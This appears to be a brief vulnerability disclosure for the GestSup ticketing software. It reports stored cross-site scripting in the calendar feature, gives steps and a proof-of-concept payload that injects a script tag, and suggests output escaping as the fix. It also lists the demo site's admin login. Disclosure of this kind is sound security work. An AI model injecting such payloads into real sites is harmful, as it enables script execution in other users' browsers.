# Title: Getsup 3.1.46 (Version 3.1 patch 46) > All vers affected
# Author: @Eawhitehat - Eren Arslan
# Vendor: https://gestsup.fr/
# Demo available : https://demo.gestsup.fr/ (User: admin Password: admin)
# Software Link: https://gestsup.fr/index.php?page=download
# CVE: N/A
# Screenshot :
- https://prnt.sc/pv00lo
- https://prnt.sc/pv00op
# XSS on calendar - Getsup ticketing
Connect to panel Getsup,
Go to calendar -> create a new evenement -> input your payload xss -> Double click for execute a payload
"><script>alert(/xss-by-eawhitehat/)</script>
Please add htmlspecialchars or htmlentities....